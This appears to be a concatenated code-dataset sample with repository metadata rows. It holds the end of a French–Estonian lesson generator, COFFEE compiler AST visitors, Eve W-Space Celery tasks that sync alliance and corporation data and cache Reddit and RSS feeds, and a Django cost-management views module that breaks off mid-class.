le premier étage [prəm'jeer_etaaž] : teine korrus
le jardin [žar'dÄ~] : aed
""")
if FULL_CONTENT:
Fun.add_lesson(u"Devinettes", intro=u"""
#. Que dit un vampire en quittant sa victime?
-- Merci beau cou.
#. Pourquoi les marins se marient-ils ?
-- Pour avoir une belle mer (mère).
""")
Fun.add_lesson(u"Virelangues", intro=u"""
#. Un chasseur sachant chasser doit savoir chasser sans son chien. ([ref s])
#. Chacun cherche son chat.
#. Poisson sans boisson est poison.
#. Ecartons ton carton, car ton carton me gêne.
#. Ton thé t'a-t-il ôté ta toux?
#. Tante, en ton temps teintais-tu tes tempes?
#. Les poules couvent souvent au couvent.
""")
Fun.parse_words(Nom,u"""
le poisson [pwa'sO~] : kala
le poison [pwa'zO~] : mürk
la boisson [bwa'sO~] : jook
le chasseur [ša'sÖÖr] : jahimees
le chien [šiÄ~] : koer
la toux [tu] : köha
""")
Fun.parse_words(Verbe,u"""
savoir [sa'vuaar] : teadma | oskama
chercher [šär'šee] : otsima
écarter [ekar'tee] : eest ära liigutama
ôter [oo'tee] : ära võtma
""")
Fun.parse_words(Autre,u"""
sans [sA~] : ilma
chacun [ža'kÖ~] : igaüks
""")
if FULL_CONTENT:
General.add_lesson(u"Lisa", intro=u"""
""")
General.parse_words(Autre,u"""
environ [A~vi'rO~] : umbes
facilement [fasil'mA~] : lihtsalt
rapidement [rapidə'mA~]: kiiresti
le autre [ootrə] : teine
le même [määm] : sama
""")
General.parse_words(Verbe,u"""
filer [fi'lee] : ketrama
baiser [bä'zee] : musitama
sauter [soo'tee] : hüppama
""")
General.parse_words(Nom,u"""
le midi [mi'di] : lõun | keskpäev
le soir [swaar] : õhtu
le matin [ma'tÄ~] : hommik
la tranche [trA~š] : lõik | viilukas
la coupe [kupp] : lõikamine | pokaal
la ébullition [ebüjis'jO~] : keemine
le feu [föö] : tuli
le baiser [bä'zee] : suudlus
le appétit [appe'ti] : isu
""")
unused = u"""
une aurore [or'Or] : koit
le fil [fil] : niit | lõng | nöör
une heure [ÖÖr] : tund
le dauphinois [dofinw'a] : lõunaprantsuse dialekt
"""
if HAS_EXERCICES:
Exercices.add_lesson(u"Lugeda oskad?", u"""
Õpetaja kirjutab tahvlile sari hääldamiskirjeldusi.
Õpilased loevad ette.
Ainult lugeda, mitte tõlkida.
""")
Exercices.parse_words(None,u"""
au clair de lune [okläärdə'lün] : kuuvalguses
le cœur de filet [kÖÖr də fi'lä] : veise sisefilee
le dessert [des'säär] : magustoit
la mousse au chocolat [musošoko'la] : šokoladivaht
le pot-au-feu [poto'föö] : ühepajatoit
le petit-beurre [pəti'bÖÖr]: (kuiv küpsis)
la sauce chasseur [soos ša'sÖÖr] : jahimehe kaste
Poitou [pwa'tu] : -
la sauce italienne [soosital'jän] : itaalia kaste
le gratin dauphinois [gra'tÄ~ dofinw'a] : (tuntud retsept)
""")
Exercices.add_lesson(u"Kirjutada oskad?", u"""
Õpetaja loeb ette sari sõnu.
Õpilased kirjutavad paberile, kasutades hääldamiskirjelduse tähestik.
""")
Exercices.parse_words(None,u"""
le chevreuil [šəv'rÖj] : metskits
le soleil [so'leij] : päike
la boisson [bwa'sO~] : jook
le poisson [pwa'sO~] : kala
le requin [rə'kÄ~] : haikala
la cuillère [kwi'jäär] : lusikas
""")
if output_format == "rst":
Files = book.add_section(u"Failid",intro=u"""
Neid faile saad alla laadida ja kuulata koos trükitud lehtedega:
- `lk. 5 <dl/lk05.mp3>`_
- `lk. 6 <dl/lk06.mp3>`_
- `lk. 7 <dl/lk07.mp3>`_
- `lk. 8 <dl/lk08.mp3>`_
""")
if __name__ == '__main__':
if output_format == "rst":
book.add_index(u"Sõnaraamat")
book.write_rst_files(sys.argv[2])
elif output_format == "odt":
if False:
book.add_dictionary(u"Sõnade nimekiri")
fn = sys.argv[2]
book.write_odt_file(fn)
os.startfile(fn)
| gpl-3.0 | -9,100,418,341,294,364,000 | 25.385458 | 133 | 0.611523 | false | 1.989088 | false | false | false |
gmarkall/COFFEE | coffee/visitors/utilities.py | 1 | 13166 | from __future__ import absolute_import
import itertools
import operator
from copy import deepcopy
from collections import OrderedDict, defaultdict
import numpy as np
from coffee.visitor import Visitor
from coffee.base import Sum, Sub, Prod, Div, ArrayInit, SparseArrayInit
from coffee.utils import ItSpace, flatten
__all__ = ["ReplaceSymbols", "CheckUniqueness", "Uniquify", "Evaluate",
"EstimateFlops", "ProjectExpansion"]
class ReplaceSymbols(Visitor):
"""Replace named symbols in a tree, returning a new tree.
:arg syms: A dict mapping symbol names to new Symbol objects.
:arg key: a callable to generate a key from a Symbol, defaults to
the string representation.
:arg copy_result: optionally copy the new Symbol whenever it is
used (guaranteeing that it will be unique)"""
def __init__(self, syms, key=lambda x: str(x),
copy_result=False):
self.syms = syms
self.key = key
self.copy_result = copy_result
super(ReplaceSymbols, self).__init__()
def visit_Symbol(self, o):
try:
ret = self.syms[self.key(o)]
if self.copy_result:
ops, okwargs = ret.operands()
ret = ret.reconstruct(ops, **okwargs)
return ret
except KeyError:
return o
def visit_object(self, o):
return o
visit_Node = Visitor.maybe_reconstruct
class CheckUniqueness(Visitor):
"""
Check if all nodes in a tree are unique instances.
"""
def visit_object(self, o, seen=None):
return seen
# Some lists appear in operands()
def visit_list(self, o, seen=None):
# Walk list entrys
for entry in o:
seen = self.visit(entry, seen=seen)
return seen
def visit_Node(self, o, seen=None):
if seen is None:
seen = set()
ops, _ = o.operands()
for op in ops:
seen = self.visit(op, seen=seen)
if o in seen:
raise RuntimeError("Tree does not contain unique nodes")
seen.add(o)
return seen
class Uniquify(Visitor):
"""
Uniquify all nodes in a tree by recursively calling reconstruct
"""
visit_Node = Visitor.always_reconstruct
def visit_object(self, o):
return deepcopy(o)
def visit_list(self, o):
return [self.visit(e) for e in o]
class Evaluate(Visitor):
@classmethod
def default_retval(cls):
return OrderedDict()
"""
Symbolically evaluate an expression enclosed in a loop nest, provided that
all of the symbols involved are constants and their value is known.
Return a dictionary mapping symbol names to (newly created) Decl nodes, each
declaration being initialized with a proper (newly computed and created)
ArrayInit object.
:arg decls: dictionary mapping symbol names to known Decl nodes.
:arg track_zeros: True if the evaluated arrays are expected to be block-sparse
and the pattern of zeros should be tracked.
"""
default_args = dict(loop_nest=[])
def __init__(self, decls, track_zeros):
self.decls = decls
self.track_zeros = track_zeros
self.mapper = {
Sum: np.add,
Sub: np.subtract,
Prod: np.multiply,
Div: np.divide
}
from coffee.vectorizer import vect_roundup, vect_rounddown
self.up = vect_roundup
self.down = vect_rounddown
super(Evaluate, self).__init__()
def visit_object(self, o, *args, **kwargs):
return self.default_retval()
def visit_list(self, o, *args, **kwargs):
ret = self.default_retval()
for entry in o:
ret.update(self.visit(entry, *args, **kwargs))
return ret
def visit_Node(self, o, *args, **kwargs):
ret = self.default_retval()
for n in o.children:
ret.update(self.visit(n, *args, **kwargs))
return ret
def visit_For(self, o, *args, **kwargs):
nest = kwargs.pop("loop_nest")
kwargs["loop_nest"] = nest + [o]
return self.visit(o.body, *args, **kwargs)
def visit_Writer(self, o, *args, **kwargs):
lvalue = o.children[0]
writes = [l for l in kwargs["loop_nest"] if l.dim in lvalue.rank]
# Evaluate the expression for each point in in the n-dimensional space
# represented by /writes/
dims = tuple(l.dim for l in writes)
shape = tuple(l.size for l in writes)
values, precision = np.zeros(shape), None
for i in itertools.product(*[range(j) for j in shape]):
point = {d: v for d, v in zip(dims, i)}
expr_values, precision = self.visit(o.children[1], point=point, *args, **kwargs)
# The sum takes into account reductions
values[i] = np.sum(expr_values)
# If values is not expected to be block-sparse, just return
if not self.track_zeros:
return {lvalue: ArrayInit(values)}
# Sniff the values to check for the presence of zero-valued blocks: ...
# ... set default nonzero patten
nonzero = [[(i, 0)] for i in shape]
# ... track nonzeros in each dimension
nonzeros_bydim = values.nonzero()
mapper = []
for nz_dim in nonzeros_bydim:
mapper_dim = defaultdict(set)
for i, nz in enumerate(nz_dim):
point = []
# ... handle outer dimensions
for j in nonzeros_bydim[:-1]:
if j is not nz_dim:
point.append((j[i],))
# ... handle the innermost dimension, which is treated "specially"
# to retain data alignment
for j in nonzeros_bydim[-1:]:
if j is not nz_dim:
point.append(tuple(range(self.down(j[i]), self.up(j[i]+1))))
mapper_dim[nz].add(tuple(point))
mapper.append(mapper_dim)
for i, dim in enumerate(mapper[:-1]):
# Group indices iff contiguous /and/ same codomain
ranges = []
grouper = lambda (m, n): (m-n, dim[n])
for k, g in itertools.groupby(enumerate(sorted(dim.keys())), grouper):
group = map(operator.itemgetter(1), g)
ranges.append((group[-1]-group[0]+1, group[0]))
nonzero[i] = ranges or nonzero[i]
# Group indices in the innermost dimension iff within vector length size
ranges, grouper = [], lambda n: self.down(n)
for k, g in itertools.groupby(sorted(mapper[-1].keys()), grouper):
group = list(g)
ranges.append((group[-1]-group[0]+1, group[0]))
nonzero[-1] = ItSpace(mode=1).merge(ranges or nonzero[-1], within=-1)
return {lvalue: SparseArrayInit(values, precision, tuple(nonzero))}
def visit_BinExpr(self, o, *args, **kwargs):
ops, _ = o.operands()
transformed = [self.visit(op, *args, **kwargs) for op in ops]
if any([a is None for a in transformed]):
return
values, precisions = zip(*transformed)
# Precisions must match
assert precisions.count(precisions[0]) == len(precisions)
# Return the result of the binary operation plus forward the precision
return self.mapper[o.__class__](*values), precisions[0]
def visit_Par(self, o, *args, **kwargs):
return self.visit(o.child, *args, **kwargs)
def visit_Symbol(self, o, *args, **kwargs):
try:
# Any time a symbol is encountered, we expect to know the /point/ of
# the iteration space which is being evaluated. In particular,
# /point/ is pushed (and then popped) on the environment by a Writer
# node. If /point/ is missing, that means the root of the visit does
# not enclose the whole iteration space, which in turn indicates an
# error in the use of the visitor.
point = kwargs["point"]
except KeyError:
raise RuntimeError("Unknown iteration space point.")
try:
decl = self.decls[o.symbol]
except KeyError:
raise RuntimeError("Couldn't find a declaration for symbol %s" % o)
try:
values = decl.init.values
precision = decl.init.precision
shape = values.shape
except AttributeError:
raise RuntimeError("%s not initialized with a numpy array" % decl)
sliced = 0
for i, (r, s) in enumerate(zip(o.rank, shape)):
dim = i - sliced
# Three possible cases...
if isinstance(r, int):
# ...the index is used to access a specific dimension (e.g. A[5][..])
values = values.take(r, dim)
sliced += 1
elif r in point:
# ...a value is being evaluated along dimension /r/ (e.g. A[r] = B[..][r])
values = values.take(point[r], dim)
sliced += 1
else:
# .../r/ is a reduction dimension
values = values.take(range(s), dim)
return values, precision
class ProjectExpansion(Visitor):
@classmethod
def default_retval(cls):
return list()
"""
Project the output of expression expansion.
The caller should provid a collection of symbols C. The expression tree (nodes
that are not of type :class:`~.Expr` are not allowed) is visited and a set of
tuples returned, one tuple for each symbol in C. Each tuple represents the subset
of symbols in C that will appear in at least one term after expansion.
For example, be C = [a, b], and consider the following input expression: ::
(a*c + d*e)*(b*c + b*f)
After expansion, the expression becomes: ::
a*c*b*c + a*c*b*f + d*e*b*c + d*e*b*f
In which there are four product terms. In these terms, there are two in which
both 'a' and 'b' appear, and there are two in which only 'b' appears. So the
visit will return [(a, b), (b,)].
:arg symbols: the collection of symbols searched for
"""
def __init__(self, symbols):
self.symbols = symbols
super(ProjectExpansion, self).__init__()
def visit_object(self, o, *args, **kwargs):
return self.default_retval()
def visit_Expr(self, o, parent=None, *args, **kwargs):
projection = self.default_retval()
for n in o.children:
projection.extend(self.visit(n, parent=o, *args, **kwargs))
ret = []
for n in projection:
if n not in ret:
ret.append(n)
return ret
def visit_Prod(self, o, parent=None, *args, **kwargs):
if isinstance(parent, Prod):
projection = self.default_retval()
for n in o.children:
projection.extend(self.visit(n, parent=o, *args, **kwargs))
return [list(flatten(projection))]
else:
# Only the top level Prod, in a chain of Prods, should do the
# tensor product
projection = [self.visit(n, parent=o, *args, **kwargs) for n in o.children]
product = itertools.product(*projection)
ret = [list(flatten(i)) for i in product] or projection
return ret
def visit_Symbol(self, o, *args, **kwargs):
return [[o.symbol]] if o.symbol in self.symbols else [[]]
class EstimateFlops(Visitor):
"""
Estimate the number of floating point operations a tree performs.
Does not look inside flat blocks, and all function calls are
assumed flop free, so this probably underestimates the number of
flops performed.
Also, these are "effective" flops, since the compiler may do fancy
things.
"""
def visit_object(self, o, *args, **kwargs):
return 0
def visit_list(self, o, *args, **kwargs):
return sum(self.visit(e) for e in o)
def visit_Node(self, o, *args, **kwargs):
ops, _ = o.operands()
return sum(self.visit(op) for op in ops)
def visit_BinExpr(self, o, *args, **kwargs):
ops, _ = o.operands()
return 1 + sum(self.visit(op) for op in ops)
def visit_AVXBinOp(self, o, *args, **kwargs):
ops, _ = o.operands()
return 4 + sum(self.visit(op) for op in ops)
def visit_Assign(self, o, *args, **kwargs):
ops, _ = o.operands()
return sum(self.visit(op) for op in ops[1:])
def visit_AugmentedAssign(self, o, *args, **kwargs):
ops, _ = o.operands()
return 1 + sum(self.visit(op) for op in ops[1:])
def visit_For(self, o, *args, **kwargs):
body_flops = sum(self.visit(b) for b in o.body)
return (o.size / o.increment) * body_flops
def visit_Invert(self, o, *args, **kwargs):
ops, _ = o.operands()
n = ops[1].symbol
return n**3
def visit_Determinant1x1(self, o, *args, **kwargs):
return 1
def visit_Determinant2x2(self, o, *args, **kwargs):
return 3
def visit_Determinant3x3(self, o, *args, **kwargs):
return 14
| bsd-3-clause | -2,043,333,322,198,643,500 | 34.297587 | 92 | 0.584764 | false | 3.894114 | false | false | false |
teknick/eve-wspace | evewspace/core/tasks.py | 3 | 6163 | # Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from celery import task
from django.core.cache import cache
import urllib
import json
from models import Alliance, Corporation, NewsFeed
from API import utils as handler
import eveapi
import feedparser
@task()
def update_alliance(allianceID):
"""
Updates an alliance and it's corporations from the API.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
allianceapi = api.eve.AllianceList().alliances.Get(allianceID)
if Alliance.objects.filter(id=allianceID).count():
# Alliance exists, update it
for corp in allianceapi.memberCorporations:
try:
update_corporation(corp.corporationID)
except AttributeError:
# Pass on this exception because one Russian corp has an
# unavoidable bad character in their description
pass
alliance = Alliance.objects.get(id=allianceID)
alliance.name = allianceapi.name
alliance.shortname = allianceapi.shortName
# Check to see if we have a record for the executor
if Corporation.objects.filter(id=allianceapi.executorCorpID).count():
alliance.executor = Corporation.objects.get(id=allianceapi.executorCorpID)
else:
# Alliance doesn't exists, add it without executor, update corps
# and then update the executor
alliance = Alliance(id=allianceapi.allianceID, name=allianceapi.name,
shortname=allianceapi.shortName, executor=None)
alliance.save()
for corp in allianceapi.memberCorporations:
try:
update_corporation(corp.corporationID)
except AttributeError:
# Fuck you, xCAPITALSx
pass
try:
# If an alliance's executor can't be processed for some reason,
# set it to None
alliance.executor = Corporation.objects.get(id=allianceapi.executorCorpID)
except:
alliance.executor = None
alliance.save()
@task()
def update_corporation(corpID, sync=False):
"""
Updates a corporation from the API. If it's alliance doesn't exist,
update that as well.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
# Encapsulate this in a try block because one corp has a fucked
# up character that chokes eveapi
try:
corpapi = api.corp.CorporationSheet(corporationID=corpID)
except:
raise AttributeError("Invalid Corp ID or Corp has malformed data.")
if corpapi.allianceID:
try:
alliance = Alliance.objects.get(id=corpapi.allianceID)
except:
# If the alliance doesn't exist, we start a task to add it
# and terminate this task since the alliance task will call
# it after creating the alliance object
if not sync:
update_alliance.delay(corpapi.allianceID)
return
else:
# Something is waiting and requires the corp object
# We set alliance to None and kick off the
# update_alliance task to fix it later
alliance = None
update_alliance.delay(corpapi.allianceID)
else:
alliance = None
if Corporation.objects.filter(id=corpID).count():
# Corp exists, update it
corp = Corporation.objects.get(id=corpID)
corp.member_count = corpapi.memberCount
corp.ticker = corpapi.ticker
corp.name = corpapi.corporationName
corp.alliance = alliance
corp.save()
else:
# Corp doesn't exist, create it
corp = Corporation(id=corpID, member_count=corpapi.memberCount,
name=corpapi.corporationName, alliance=alliance)
corp.save()
return corp
@task()
def update_all_alliances():
"""
Updates all corps in all alliances. This task will take a long time
to run.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
alliancelist = api.eve.AllianceList()
for alliance in alliancelist.alliances:
update_alliance(alliance.allianceID)
@task()
def cache_eve_reddit():
"""
Attempts to cache the top submissions to r/Eve.
"""
current = cache.get('reddit')
if not current:
# No reddit data is cached, grab it.
data = json.loads(urllib.urlopen('http://www.reddit.com/r/Eve/top.json').read())
cache.set('reddit', data, 120)
else:
# There is cached data, let's try to update it
data = json.loads(urllib.urlopen('http://www.reddit.com/r/Eve/top.json').read())
if 'data' in data:
# Got valid response, store it
cache.set('reddit', data, 120)
else:
# Invalid response, refresh current data
cache.set('reddit', current, 120)
@task
def update_feeds():
"""
Caches and updates RSS feeds in NewsFeeds.
"""
for feed in NewsFeed.objects.all():
try:
data = feedparser.parse(feed.url)
cache.set('feed_%s' % feed.pk, data, 7200)
feed.name = data['feed']['title']
feed.description = data['feed']['subtitle']
feed.save()
except:
# There shouldn't be any exceptions, but we want to continue
# if there are.
pass
| gpl-3.0 | 887,700,468,034,383,200 | 36.809816 | 88 | 0.636703 | false | 3.94811 | false | false | false |
infoINGenieria/Zweb | z_web/costos/views.py | 1 | 20488 | # coding: utf-8
from functools import partial, wraps
from django.apps import apps
from django.contrib import messages
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.core.urlresolvers import reverse, reverse_lazy
from django.db import IntegrityError, models
from django.db.transaction import atomic
from django.views.generic import TemplateView, CreateView, ListView, UpdateView, DeleteView
from django.forms.utils import ErrorList
from django.forms.formsets import formset_factory
from django.http import HttpResponseRedirect
from django.utils.safestring import mark_safe
from django.shortcuts import render
from core.models import Obras, UserExtension
from parametros.models import Periodo, FamiliaEquipo
from zweb_utils.mixins import TableFilterListView, ModalViewMixin
from zweb_utils.views import LoginAndPermissionRequiredMixin
from .models import (CostoParametro, Costo, CostoTipo, AvanceObra)
from .forms import (CostoItemForm, CostoItemFamiliaForm,
CopiaCostoForm, CostoCCForm, PeriodoCCForm, PeriodoCostoTipoForm,
CostoEquipoForm, CostoEditPorCCForm, CostoEditPorEquipoForm,
AvanceObraEditForm, CentroCostoSelectForm, AvanceObraCreateForm)
from .tables import (CostoTableGeneric, CostosByCCTotalTable,
CostosByEquipoMontoHSTable, AvanceObraTable)
from .filters import CostosFilter, AvanceObraFilter
class BaseCostosMixin(LoginAndPermissionRequiredMixin):
permission_required = 'costos.can_manage_costos'
permission_denied_message = "No posee los permisos suficientes para ingresar a esa sección"
raise_exception = True
class FormWithUserMixin(object):
def get_form_kwargs(self):
kwargs = super(FormWithUserMixin, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
class CopiaCostosView(BaseCostosMixin, TemplateView):
"""
Vista para copiar costos de un periodo a otro.
"""
template_name = "frontend/costos/copiar_costos.html"
def get_context_data(self, **kwargs):
context = super(CopiaCostosView, self).get_context_data(**kwargs)
if 'copia_form' not in kwargs:
context["copia_form"] = CopiaCostoForm()
return context
def post(self, request, *args, **kwargs):
p_form = CopiaCostoForm(self.request.POST)
if p_form.is_valid():
return self.form_valid(p_form)
else:
return self.form_invalid(p_form)
def form_invalid(self, p_form):
return self.render_to_response(
self.get_context_data(copia_form=p_form))
def form_valid(self, form):
tipos = form.cleaned_data["tipo_costos"]
de_periodo= form.cleaned_data["de_periodo"]
a_periodo = form.cleaned_data["a_periodo"]
recalcular = form.cleaned_data["recalcular"]
if recalcular:
try:
des_param = CostoParametro.objects.get(periodo=a_periodo)
# ori_param = CostoParametro.objects.get(periodo=de_periodo)
except CostoParametro.DoesNotExist:
messages.add_message(self.request, messages.ERROR,
mark_safe("Asegúrese de definir los <b><a href='{}'>parámetros "
"de costos</a></b> para ambos periodos seleccionados.".format(
reverse('admin:costos_costoparametro_changelist'))))
return self.form_invalid(form)
copia_dict = dict()
for tipo_costo in tipos:
with atomic():
for obj in Costo.objects.filter(tipo_costo=tipo_costo, periodo=de_periodo):
try:
if tipo_costo not in copia_dict:
copia_dict[tipo_costo] = True
obj.pk = None
if recalcular:
obj.recalcular_valor(des_param)
obj.periodo = a_periodo
obj.clean()
obj.save()
except (IntegrityError, ValidationError):
copia_dict[tipo_costo] = False
for tipo_costo in tipos:
if tipo_costo in copia_dict:
if copia_dict[tipo_costo]:
messages.add_message(
self.request, messages.SUCCESS,
mark_safe("Se crearon ítems de <b>{}</b> para el periodo {}".format(tipo_costo.nombre, a_periodo)))
else:
messages.add_message(
self.request, messages.WARNING,
mark_safe("Hecho! Existían previamente ítems de <b>{}</b> para el periodo {}. Puede editarlos haciendo clic <a href='{}?tipo_costo={}&periodo={}'><b>acá</b></a>.".format(
tipo_costo, a_periodo, reverse('costos:costos_list'), tipo_costo.pk, a_periodo.pk)))
else:
messages.add_message(
self.request, messages.WARNING,
mark_safe("No existen ítems de <b>{}</b> para el periodo {}".format(tipo_costo, de_periodo)))
return HttpResponseRedirect(reverse('costos:copia_costos'))
class CostosList(BaseCostosMixin, TableFilterListView):
template_name = 'frontend/costos/costo_list.html'
filterset_class = CostosFilter
model = Costo
def get_filterset(self, *args, **kwargs):
"""
Solo mostramos centro de costos de la unidad de negocio del usuario
"""
fs = super(CostosList, self).get_filterset(*args, **kwargs)
fs.filters['centro_costo'].field.queryset = Obras.get_centro_costos(self.request.user)
return fs
def get_queryset(self):
uns = UserExtension.get_unidades_negocio(self.request.user)
if uns.filter(codigo='OS').exclude(codigo='MS').exists(): # OS no tiene costos por equipos
return Costo.objects.filter(
centro_costo__in=Obras.get_centro_costos(self.request.user))
elif uns.filter(codigo='MS').exclude(codigo='OS').exists():
return Costo.objects.filter(
models.Q(centro_costo__in=Obras.get_centro_costos(self.request.user)) |
models.Q(centro_costo__isnull=True))
# otro caso
return Costo.objects.all()
def get_table_class(self, **kwargs):
if self.filterset.form.is_valid():
tipo_costo = self.filterset.form.cleaned_data["tipo_costo"]
relacionado_con = self.filterset.form.cleaned_data["relacionado_con"]
if tipo_costo:
return CostosByCCTotalTable if tipo_costo.es_por_cc else CostosByEquipoMontoHSTable
if relacionado_con:
return CostosByCCTotalTable if relacionado_con == 'cc' else CostosByEquipoMontoHSTable
return CostoTableGeneric
def get_context_data(self, **kwargs):
ctx = super(CostosList, self).get_context_data(**kwargs)
ctx["is_filtered"] = self.filterset.form.is_valid()
return ctx
class CostosAltaCC(BaseCostosMixin, TemplateView):
model = Costo
template_name = "frontend/costos/costos_cc_form.html"
def _form_class(self):
return PeriodoCCForm
def _get_formset(self):
return formset_factory(CostoCCForm, extra=0)
def get_context_data(self, **kwargs):
context = super(CostosAltaCC, self).get_context_data(**kwargs)
context["tipos_costos"] = self.get_queryset()
if "p_form" not in kwargs:
context["p_form"] = self._form_class()(self.request.user)
if "formsets" not in kwargs:
Formset = self._get_formset()
initial = [{'tipo_costo': x.pk} for x in context["tipos_costos"]]
context["formsets"] = Formset(initial=initial)
return context
def get_queryset(self, **kwargs):
return CostoTipo.objects.filter(relacionado_con='cc')
def post(self, request, *args, **kwargs):
p_form = self._form_class()(self.request.user, self.request.POST)
formsets = self._get_formset()(self.request.POST)
if p_form.is_valid() and formsets.is_valid():
return self.form_valid(p_form, formsets)
else:
return self.form_invalid(p_form, formsets)
def form_invalid(self, p_form, formsets):
return self.render_to_response(self.get_context_data(p_form=p_form, formsets=formsets))
def form_valid(self, p_form, formsets):
has_error = False
periodo = p_form.cleaned_data["periodo"]
centro_costo = p_form.cleaned_data["centro_costo"]
saved_count = 0
try:
with atomic():
for f in formsets:
if f.cleaned_data["monto_total"]:
tipo_costo = f.cleaned_data["tipo_costo"]
if self.model.objects.filter(
periodo=periodo, centro_costo=centro_costo, tipo_costo=tipo_costo).exists():
errors = f._errors.setdefault("monto_total", ErrorList())
errors.append(u"Ya existe un valor para el periodo y centro de costo seleccionado.")
has_error = True
else:
costo = self.model(**f.cleaned_data)
costo.centro_costo = centro_costo
costo.periodo = periodo
costo.save()
saved_count += 1
if has_error:
raise IntegrityError
except IntegrityError:
return self.form_invalid(p_form, formsets)
return self.response_result(p_form, formsets, saved_count)
def response_result(self, p_form, formsets, saved_count):
if saved_count:
messages.add_message(
self.request, messages.SUCCESS,
"Se añadieron correctamente {} costos al centro de costos '{}' para el periodo '{}'".format(
saved_count, p_form.cleaned_data["centro_costo"], p_form.cleaned_data["periodo"]))
return HttpResponseRedirect(reverse('costos:costos_alta_cc'))
else:
messages.add_message(self.request, messages.WARNING, "No íngresó valores de costos")
return self.form_invalid(p_form, formsets)
class CostosAltaEquipos(BaseCostosMixin, TemplateView):
template_name = "frontend/costos/costos_eq_form.html"
form_class = CostoItemForm
model = Costo
def _form_class(self):
return PeriodoCostoTipoForm
def _get_formset(self):
return formset_factory(CostoEquipoForm, extra=0)
def get_context_data(self, **kwargs):
context = super(CostosAltaEquipos, self).get_context_data(**kwargs)
context["familias"] = self.get_queryset()
if "p_form" not in kwargs:
context["p_form"] = self._form_class()()
if "formsets" not in kwargs:
Formset = self._get_formset()
initial = [{'familia_equipo': x.pk} for x in context["familias"]]
context["formsets"] = Formset(initial=initial)
return context
def get_queryset(self, **kwargs):
return FamiliaEquipo.objects.all()
def post(self, request, *args, **kwargs):
p_form = self._form_class()(self.request.POST)
formsets = self._get_formset()(self.request.POST)
if p_form.is_valid() and formsets.is_valid():
return self.form_valid(p_form, formsets)
else:
return self.form_invalid(p_form, formsets)
def form_invalid(self, p_form, formsets):
return self.render_to_response(self.get_context_data(p_form=p_form, formsets=formsets))
def form_valid(self, p_form, formsets):
has_error = False
periodo = p_form.cleaned_data["periodo"]
tipo_costo = p_form.cleaned_data["tipo_costo"]
saved_count = 0
try:
with atomic():
for f in formsets:
if f.cleaned_data["monto_hora"] or f.cleaned_data["monto_mes"] or f.cleaned_data["monto_anio"]:
familia = f.cleaned_data["familia_equipo"]
if self.model.objects.filter(
periodo=periodo, familia_equipo=familia, tipo_costo=tipo_costo).exists():
errors = f._errors.setdefault("monto_hora", ErrorList())
errors.append(u"Ya existe un valor para el periodo y familia de equipos seleccionado.")
has_error = True
else:
costo = self.model(**f.cleaned_data)
costo.tipo_costo = tipo_costo
costo.periodo = periodo
costo.save()
saved_count += 1
if has_error:
raise IntegrityError
except CostoParametro.DoesNotExist:
messages.add_message(
self.request, messages.ERROR,
mark_safe("No están definidos los <a href='{}'>parámetros de costos</a> para el "
"periodo {}".format(reverse('admin:costos_costoparametro_changelist'), periodo)))
return self.form_invalid(p_form, formsets)
except IntegrityError:
return self.form_invalid(p_form, formsets)
return self.response_result(p_form, formsets, saved_count)
def response_result(self, p_form, formsets, saved_count):
if saved_count:
messages.add_message(
self.request, messages.SUCCESS,
"Se añadieron correctamente {} costos del tipo '{}' para el periodo '{}'".format(
saved_count, p_form.cleaned_data["tipo_costo"], p_form.cleaned_data["periodo"]))
return HttpResponseRedirect(reverse('costos:costos_alta_eq'))
else:
messages.add_message(self.request, messages.WARNING, "No íngresó valores de costos")
return self.form_invalid(p_form, formsets)
class CargarCostosSelectView(BaseCostosMixin, TemplateView):
template_name = 'frontend/costos/modal/cargar_costos_select.html'
class EditarCostosView(BaseCostosMixin, FormWithUserMixin, ModalViewMixin, UpdateView):
model = Costo
def get_form_class(self, **kwargs):
return CostoEditPorCCForm if self.object.tipo_costo.es_por_cc else CostoEditPorEquipoForm
def get_url_post_form(self):
return reverse_lazy('costos:costos_edit', args=(self.object.pk, ))
def get_context_data(self, *args, **kwargs):
ctx = super(EditarCostosView, self).get_context_data(*args, **kwargs)
ctx["modal_title"] = 'Editar %s' % self.model._meta.verbose_name
return ctx
def form_valid(self, form):
obj = form.save()
return render(self.request, 'modal_success.html', {'obj': obj})
class EliminarCostosView(BaseCostosMixin, ModalViewMixin, DeleteView):
# http_method_names = ["post", ]
model = Costo
template_name = "modal_delete_form.html"
def get_url_post_form(self):
return reverse_lazy('costos:costos_delete', args=(self.object.pk, ))
def post(self, *args, **kwargs):
obj = self.get_object()
obj.delete()
return render(self.request, 'modal_delete_success.html', {'obj': obj})
##################
# AVANCE DE OBRA #
##################
class AvanceObraList(BaseCostosMixin, TableFilterListView):
template_name = 'frontend/costos/avance_obra_list.html'
filterset_class = AvanceObraFilter
model = AvanceObra
table_class = AvanceObraTable
def get_filterset(self, *args, **kwargs):
"""
Solo mostramos centro de costos de la unidad de negocio del usuario
"""
fs = super(AvanceObraList, self).get_filterset(*args, **kwargs)
fs.filters['centro_costo'].field.queryset = Obras.get_centro_costos(self.request.user)
return fs
def get_context_data(self, **kwargs):
ctx = super(AvanceObraList, self).get_context_data(**kwargs)
ctx["is_filtered"] = self.filterset.form.is_valid()
return ctx
def get_queryset(self):
return self.model.objects.filter(
centro_costo__in=Obras.get_centro_costos(self.request.user))
class AvanceObraEditView(BaseCostosMixin, FormWithUserMixin, ModalViewMixin, UpdateView):
model = AvanceObra
form_class = AvanceObraEditForm
def get_url_post_form(self):
return reverse_lazy('costos:avances_obra_edit', args=(self.object.pk, ))
def get_context_data(self, *args, **kwargs):
ctx = super(AvanceObraEditView, self).get_context_data(*args, **kwargs)
ctx["modal_title"] = 'Editar %s' % self.model._meta.verbose_name
return ctx
def form_valid(self, form):
obj = form.save()
return render(self.request, 'modal_success.html', {'obj': obj})
class AvanceObraDeleteView(BaseCostosMixin, ModalViewMixin, DeleteView):
